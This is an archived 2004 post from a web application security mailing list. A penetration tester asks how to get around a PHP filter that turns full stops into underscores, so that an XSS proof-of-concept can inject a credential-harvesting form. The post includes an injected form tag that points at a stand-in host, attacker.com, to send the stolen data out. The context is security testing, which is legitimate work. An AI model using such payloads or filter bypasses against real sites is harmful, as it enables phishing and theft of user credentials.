Home page logo
/

webappsec logo WebApp Sec mailing list archives

Fullstop Substitution in XSS
From: "Calum Power" <enune () fribble net>
Date: Sat, 29 May 2004 14:49:29 +1000 (EST)

Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script";> is of course being filtered
into: <form target="http://attacker_com/path/to/script";>

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Cheers,
Calum
--
Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic

enune () fribble net
http://www.fribble.net


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]